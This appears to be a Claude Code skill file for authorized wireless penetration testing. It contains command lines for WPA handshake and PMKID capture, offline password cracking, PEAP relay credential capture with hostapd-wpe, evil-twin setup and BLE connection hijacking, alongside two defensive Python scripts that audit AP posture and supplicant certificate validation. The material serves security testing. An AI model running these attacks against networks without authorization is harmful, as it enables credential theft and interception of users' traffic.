---
name: pentest-wireless
description: Wireless network pentest — WPA/WPA2/WPA3, evil twin, 802.1X enterprise, Bluetooth advisory. Triggers on wireless pentest, WiFi, WPA2, WPA3, PMKID, evil twin, deauth, Aircrack, hcxdumptool, 802.1X, Bluetooth, BLE security.
license: MIT
compatibility: Works with Claude Code
allowed-tools: Read Write Edit Bash Grep
metadata:
  author: badi
  badi-version: ">=1.24.0"
  category: pentest
  scope: advisory
  inspired-by: 0xSteph/pentest-ai-agents wireless-pentester
---

# pentest-wireless

WiFi + Bluetooth pentest advisory. Active WiFi attacks require **physical presence within the engagement + spectrum authorization**.

## Triggers

- "WiFi pentest"
- "WPA2 handshake crack"
- "WPA3 SAE"
- "evil twin"
- "deauth saldirisi"
- "802.1X PEAP"
- "Bluetooth pentest"
- "BLE GATT"

## Methodology

```
1. Recon: passive listening with airodump-ng / kismet
2. Target identification: SSID, BSSID, channel, encryption, client count
3. Capture handshake: deauth + capture (WPA2) / PMKID (no client required)
4. Crack: hashcat / aircrack-ng
5. Post-connection: ARP spoofing + MITM (if applicable)
6. Enterprise: EAP-PEAP relay (hostapd-wpe)
```

## Target Identification

```bash
# QUIET — passive monitor
airodump-ng wlan0mon                          # list all APs
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

# QUIET — channel hop monitor
kismet -c wlan0
```

## Handshake Capture Approaches

| Method | Description | OPSEC |
|--------|-------------|-------|
| 4-way + deauth | Requires an active client + deauth attack | LOUD |
| PMKID | No client required (weakness in many modern APs) | QUIET |
| WPS PIN | Brute force against WPS-enabled AP (Reaver, Bully) | LOUD |
| Evil twin | Own AP, phish users | LOUD (legal risk) |

```bash
# PMKID capture (quietest, no client required)
hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1
hcxpcapngtool -o hash.hc22000 pmkid.pcapng

# Hashcat crack
hashcat -m 22000 hash.hc22000 wordlist.txt -r rules/best64.rule

# 4-way handshake (classic)
aircrack-ng -w wordlist.txt -b AA:BB:CC:DD:EE:FF capture-01.cap
```

## WPA3 SAE

- Dragonblood attacks (CVE-2019-9494, CVE-2019-9495): downgrade + side-channel
- Transition mode (WPA2 + WPA3): downgrade via WPA2 fallback
- SAE-PT: offline pre-shared password table (group-specific)
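The recon output from the Target Identification step, the PSK/PMKID exposure in the handshake table and the WPA3 transition-mode downgrade above all reduce to the same question for the report: which APs in the inventory carry which posture finding. The following is an added example, not code from the skill file or the aircrack-ng project: a small Python audit that parses an airodump-ng style AP list and maps each AP to a severity and a recommendation. `SAMPLE_CSV` is constructed in the layout of the AP section of an airodump-ng `-w <prefix>` CSV dump (column names as airodump-ng writes them, BSSIDs and ESSIDs made up); the `WPA3 WPA2` / `SAE PSK` spelling for a transition-mode AP is an assumption about that output and may need adjusting for your airodump-ng version.

```python
"""Turn an airodump-ng AP inventory into posture findings (added example)."""
import csv
import io

# Constructed sample in airodump-ng CSV layout: AP rows, blank line, station rows.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:00:00:01, 2024-03-01 10:00:00, 2024-03-01 10:05:00,  6,  54, WPA2, CCMP, PSK, -40,  120,  0,   0.  0.  0.  0,   8, CorpWiFi,
AA:BB:CC:00:00:02, 2024-03-01 10:00:00, 2024-03-01 10:05:00, 11,  54, WPA2, CCMP, MGT, -55,   80,  0,   0.  0.  0.  0,  14, CorpEnterprise,
AA:BB:CC:00:00:03, 2024-03-01 10:00:00, 2024-03-01 10:05:00,  1,  54, OPN,  , , -60,   40,  0,   0.  0.  0.  0,   9, CorpGuest,
AA:BB:CC:00:00:04, 2024-03-01 10:00:00, 2024-03-01 10:05:00, 36, 866, WPA3 WPA2, CCMP, SAE PSK, -50,  100,  0,   0.  0.  0.  0,   7, CorpIoT,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
"""


def parse_ap_rows(text):
    """Return the AP rows (dicts keyed by column name); the station table after
    the blank line is ignored."""
    ap_section = text.split("\n\n", 1)[0]
    reader = csv.DictReader(io.StringIO(ap_section), skipinitialspace=True)
    rows = []
    for row in reader:
        # Normalise header/value whitespace; drop overflow fields (key None).
        rows.append({k.strip(): (v or "").strip() for k, v in row.items() if k is not None})
    return rows


def classify(ap):
    """Map one AP row to (severity, finding). Rules are ordered worst-first and
    the first match wins, following the recommendations in this skill."""
    privacy = set(ap.get("Privacy", "").split())          # e.g. {"WPA3", "WPA2"}
    auth = set(ap.get("Authentication", "").split())      # e.g. {"SAE", "PSK"}
    if "OPN" in privacy:
        return "CRITICAL", "open network: traffic readable by anyone in range; isolate the guest VLAN"
    if "WEP" in privacy:
        return "CRITICAL", "WEP: broken cipher, migrate immediately"
    if "WPA3" in privacy and ("WPA2" in privacy or "WPA" in privacy):
        return "HIGH", "WPA2/WPA3 transition mode: clients can be downgraded to WPA2; move to WPA3-only"
    if "WPA3" in privacy:
        return "LOW", "WPA3-SAE only: keep AP firmware patched (Dragonblood fixes)"
    if "MGT" in auth:
        return "MEDIUM", "WPA2-Enterprise: confirm clients validate the RADIUS server certificate (PEAP relay risk)"
    if "PSK" in auth:
        return "HIGH", "WPA2-PSK: captured handshake/PMKID is crackable offline if the passphrase is weak; prefer EAP-TLS"
    return "INFO", "unclassified security setting"


def audit(text):
    """Return [(essid, bssid, severity, finding), ...] for every AP in the dump."""
    return [(ap["ESSID"], ap["BSSID"], *classify(ap)) for ap in parse_ap_rows(text)]


if __name__ == "__main__":
    for essid, bssid, severity, finding in audit(SAMPLE_CSV):
        print(f"[{severity}] {essid} ({bssid}): {finding}")
```

Feed it the `-01.csv` file that `airodump-ng -w capture` writes instead of `SAMPLE_CSV` to get the AP inventory section of the report template pre-filled with a severity per network.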

## 802.1X Enterprise

```bash
# EAP relay (hostapd-wpe): user credential capture
hostapd-wpe ./hostapd-wpe.conf

# Cred captured -> NTLM hash crack (offline)
hashcat -m 5500 hash.txt wordlist.txt
```

Countermeasure: client-side certificate validation (server certificate validation + CA pinning) must be mandatory during user onboarding.
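Whether a client actually enforces that countermeasure is visible in its supplicant configuration. The following is an added example (not the skill's or wpa_supplicant's own code): a Python linter over `wpa_supplicant.conf` network blocks that flags EAP networks with no `ca_cert` and no server-name match, which is exactly the client state a PEAP relay needs. The two config blocks are constructed; the option names (`key_mgmt`, `eap`, `phase2`, `ca_cert`, `domain_match`, `domain_suffix_match`, `altsubject_match`, `subject_match`) are real wpa_supplicant options.

```python
"""Lint wpa_supplicant network blocks for missing server certificate validation
(added example)."""
import re

# Constructed: a PEAP profile as a careless onboarding script might write it.
WEAK_CONF = """
network={
    ssid="CorpEnterprise"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="jdoe"
    password="hunter2"
    phase2="auth=MSCHAPV2"
}
"""

# Constructed: same profile with the CA pinned and the RADIUS server name checked.
HARDENED_CONF = """
network={
    ssid="CorpEnterprise"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="jdoe"
    password="hunter2"
    phase2="auth=MSCHAPV2"
    ca_cert="/etc/ssl/certs/corp-radius-ca.pem"
    domain_match="radius.corp.example"
}
"""

BLOCK_RE = re.compile(r"network=\{(.*?)\}", re.S)
NAME_CHECKS = ("domain_match", "domain_suffix_match", "altsubject_match", "subject_match")


def parse_networks(conf):
    """Return one {option: value} dict per network={...} block (quotes stripped)."""
    nets = []
    for body in BLOCK_RE.findall(conf):
        kv = {}
        for line in body.splitlines():
            line = line.strip()
            if not line or line.startswith("#") or "=" not in line:
                continue
            k, v = line.split("=", 1)
            kv[k.strip()] = v.strip().strip('"')
        nets.append(kv)
    return nets


def lint_eap_network(net):
    """Return the list of problems for one network block (empty list = OK)."""
    problems = []
    if "EAP" not in net.get("key_mgmt", ""):
        return problems  # PSK/SAE/open networks are out of scope for this check
    has_ca = "ca_cert" in net or "ca_path" in net
    if not has_ca:
        problems.append("no ca_cert: any RADIUS server certificate is accepted, so a rogue AP can terminate the TLS tunnel")
    if not any(k in net for k in NAME_CHECKS):
        problems.append("no server name check: any certificate issued by the trusted CA is accepted")
    if net.get("eap") in ("PEAP", "TTLS") and "MSCHAPV2" in net.get("phase2", "").upper() and not has_ca:
        problems.append("MSCHAPv2 inner auth without tunnel validation: the challenge/response can be captured and cracked offline")
    return problems


def lint(conf):
    """Map ssid -> list of problems for every network block in the config text."""
    return {n.get("ssid", "?"): lint_eap_network(n) for n in parse_networks(conf)}


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        for ssid, problems in lint(conf).items():
            print(f"{label}: {ssid}: {problems or 'OK'}")
```

Run it over the deployed `wpa_supplicant.conf` (or the equivalent profile export on other platforms) as part of the onboarding review; the hardened block is the shape every enterprise profile should have before the relay test in the methodology is even attempted.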

## Evil Twin (Legal Framework Matters)

- Only within the scope of a **client-authorized pentest**
- Hotspot impersonating the target AP's SSID
- User enters credentials -> capture
- **Risk**: accidentally phishing authorized users + GDPR violation

```bash
# WiFi-Pumpkin / Pi-Hole AP framework
# Pumpkin -i wlan0 --ssid "Corp-Guest"
```

## Bluetooth / BLE

```bash
# QUIET — passive scan
hcitool lescan
sudo bluetoothctl
# > scan on

# BLE GATT enumeration
gatttool -b AA:BB:CC:DD:EE:FF -I
# > connect
# > primary
# > characteristics

# BLE replay/MITM (gatttool + spoof)
# btlejack: BLE sniffer + relay
btlejack -s                                   # sniff advertisements
btlejack -c any -j                            # hijack connection (CTF/lab)
```

## Output Template

```markdown
## Wireless Pentest: <location>

### AP Inventory
- "CorpWiFi" (WPA2-PSK): handshake captured, cracked in 3h (weak password)
- "CorpEnterprise" (WPA2-EAP): 12 user credentials captured via PEAP relay
- "CorpGuest" (Open): captive portal bypass attempt (out-of-scope)

### Findings
- WPA2-PSK password "Spring2024" (3h crack)
- Missing certificate validation on client devices -> 802.1X PEAP relay successful

### Recommendations
- PSK -> Enterprise EAP-TLS (certificates)
- Client-side certificate pinning mandatory
- WPA3-only mode (disable transition mode)
```

## Out-of-Scope

- Unauthorized spectrum use / radio operation without permission (CFAA + legal risk)
- DoS via deauth against third parties (legal risk + scope-guard hard refusal)
- Evil twin at a third-party location
